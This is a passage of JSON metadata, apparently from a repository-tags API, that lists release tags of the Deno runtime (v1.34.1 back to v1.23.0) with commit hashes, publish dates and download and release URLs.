ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0